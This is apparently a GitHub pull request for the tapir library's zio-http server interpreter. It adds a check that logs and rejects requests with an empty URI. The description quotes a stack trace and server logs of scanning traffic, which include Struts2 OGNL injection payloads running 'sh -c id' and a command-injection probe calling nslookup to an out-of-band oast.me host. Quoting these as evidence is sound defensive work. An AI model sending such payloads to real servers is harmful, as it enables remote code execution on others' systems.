### PR TITLE
Guard against bad zio-http Request objects, sometimes provoked by malicious requests 

### DIFF
--- a/server/zio-http-server/src/main/scala/sttp/tapir/server/ziohttp/ZioHttpInterpreter.scala
+++ b/server/zio-http-server/src/main/scala/sttp/tapir/server/ziohttp/ZioHttpInterpreter.scala
@@ -49,7 +49,8 @@ trait ZioHttpInterpreter[R] {
               None
 
           grossInvalidity(request) match {
-            case Some( message ) => ZIO.fail(Response.internalServerError(message))
+            case Some( message ) =>
+              ZIO.logError( "Grossly invalid zio-http request: " + message ) *> ZIO.fail(Response.internalServerError(message))
             case None => {
               val serverRequest = ZioHttpServerRequest(request)
               interpreter

--- a/server/zio-http-server/src/main/scala/sttp/tapir/server/ziohttp/ZioHttpInterpreter.scala
+++ b/server/zio-http-server/src/main/scala/sttp/tapir/server/ziohttp/ZioHttpInterpreter.scala
@@ -42,36 +42,28 @@ trait ZioHttpInterpreter[R] {
             zioHttpServerOptions.deleteFile
           )
 
-          def grossInvalidity( request : Request ) : Option[String] =
-            if (request.url.encode.trim.isEmpty)
-              Some("Received apparenty empty request URI from " + request)
-            else
-              None
+          if (request.url.encode.trim.isEmpty) {
+            ZIO.logError("Received an apparently empty request URI, not handling: " + request) *>
+              ZIO.fail(Response.internalServerError("Empty request URI"))
+          } else {
+            val serverRequest = ZioHttpServerRequest(request)
+            interpreter
+              .apply(serverRequest)
+              .foldCauseZIO(
+                cause => ZIO.logErrorCause(cause) *> ZIO.fail(Response.internalServerError(cause.squash.getMessage)),
+                {
+                  case RequestResult.Response(resp) =>
+                    resp.body match {
+                      case None              => handleHttpResponse(resp, None)
+                      case Some(Right(body)) => handleHttpResponse(resp, Some(body))
+                      case Some(Left(body))  => handleWebSocketResponse(body, zioHttpServerOptions.customWebSocketConfig(serverRequest))
+                    }
 
-          grossInvalidity(request) match {
-            case Some( message ) =>
-              ZIO.logError( "Grossly invalid zio-http request: " + message ) *> ZIO.fail(Response.internalServerError(message))
-            case None => {
-              val serverRequest = ZioHttpServerRequest(request)
-              interpreter
-                .apply(serverRequest)
-                .foldCauseZIO(
-                  cause => ZIO.logErrorCause(cause) *> ZIO.fail(Response.internalServerError(cause.squash.getMessage)),
-                  {
-                    case RequestResult.Response(resp) =>
-                      resp.body match {
-                        case None              => handleHttpResponse(resp, None)
-                        case Some(Right(body)) => handleHttpResponse(resp, Some(body))
-                        case Some(Left(body))  => handleWebSocketResponse(body, zioHttpServerOptions.customWebSocketConfig(serverRequest))
-                      }
-
-                    case RequestResult.Failure(_) =>
-                      ZIO.fail(Response.notFound)
-                  }
-                )
-            }
+                  case RequestResult.Failure(_) =>
+                    ZIO.fail(Response.notFound)
+                }
+              )
           }
-
         }
       }
     )


### PR DESCRIPTION
Certain (malicious) requests currently zio-http `Request` objects with a `url` field that encodes to an empty String, provoking an exceptions within tapir zio-http like

```
timestamp=2024-01-24T15:01:30.568420263Z level=ERROR thread=#zio-fiber-130 message="" cause="Exception in thread "zio-fiber-130" java.lang.IllegalArgumentException: empty string is not valid uri
         at sttp.model.UriInterpolator$.interpolate(UriInterpolator.scala:66)
         at sttp.model.UriInterpolator$UriContext.uri(UriInterpolator.scala:39)
         at sttp.model.Uri$.unsafeParse(Uri.scala:537)
         at sttp.tapir.server.ziohttp.ZioHttpServerRequest.uri$lzyINIT1(ZioHttpServerRequest.scala:23)
         at sttp.tapir.server.ziohttp.ZioHttpServerRequest.uri(ZioHttpServerRequest.scala:23)
         at sttp.tapir.server.ziohttp.ZioHttpServerRequest.pathSegments$lzyINIT1(ZioHttpServerRequest.scala:20)
         at sttp.tapir.server.ziohttp.ZioHttpServerRequest.pathSegments(ZioHttpServerRequest.scala:20)
         at sttp.tapir.server.interpreter.FilterServerEndpoints.apply(FilterServerEndpoints.scala:14)
         at sttp.tapir.server.interpreter.FilterServerEndpoints.apply(FilterServerEndpoints.scala:13)
         at sttp.tapir.server.interpreter.ServerInterpreter.apply$$anonfun$1(ServerInterpreter.scala:24)
         at zio.ZIO$.suspend$$anonfun$1(ZIO.scala:4624)
         at zio.FiberRef$unsafe$$anon$2.getWith$$anonfun$1(FiberRef.scala:474)
         at sttp.tapir.ztapir.RIOMonadError.suspend(RIOMonadError.scala:13)
         at sttp.tapir.server.ziohttp.ZioHttpInterpreter.toHttp(ZioHttpInterpreter.scala:62)" location=sttp.tapir.server.ziohttp.ZioHttpInterpreter.toHttp file=ZioHttpInterpreter.scala line=50
```
As far as I can tell, these exceptions are harmless and _tapir_ appropriately returns a `500` error response.

Nevertheless, maybe it's better not to let bad requests provoke unanticipated exceptions within _tapir_ internals, to guard against those requests instead. That is the intent of this pull request.

Some requests that apparently provoke this (just correlating log times) include

```
20.194.161.187 - - [24/Jan/2024:13:34:41 +0000] "GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
20.194.161.187 - - [24/Jan/2024:13:34:42 +0000] "GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
20.194.161.187 - - [24/Jan/2024:13:34:43 +0000] "GET /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
20.194.161.187 - - [24/Jan/2024:13:34:44 +0000] "GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
20.194.161.187 - - [24/Jan/2024:13:34:44 +0000] "GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
20.194.161.187 - - [24/Jan/2024:13:34:45 +0000] "GET /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
20.194.161.187 - - [24/Jan/2024:13:34:46 +0000] "GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
20.194.161.187 - - [24/Jan/2024:13:34:47 +0000] "GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
20.194.161.187 - - [24/Jan/2024:13:34:48 +0000] "GET /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36"
20.194.161.187 - - [24/Jan/2024:14:39:15 +0000] "GET /webadmin/script?command=|%20nslookup%20cmoe8rs61jc80cur53tgmec4tz6u89sjg.oast.me HTTP/1.1" 500 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
20.194.161.187 - - [24/Jan/2024:15:01:30 +0000] "GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
```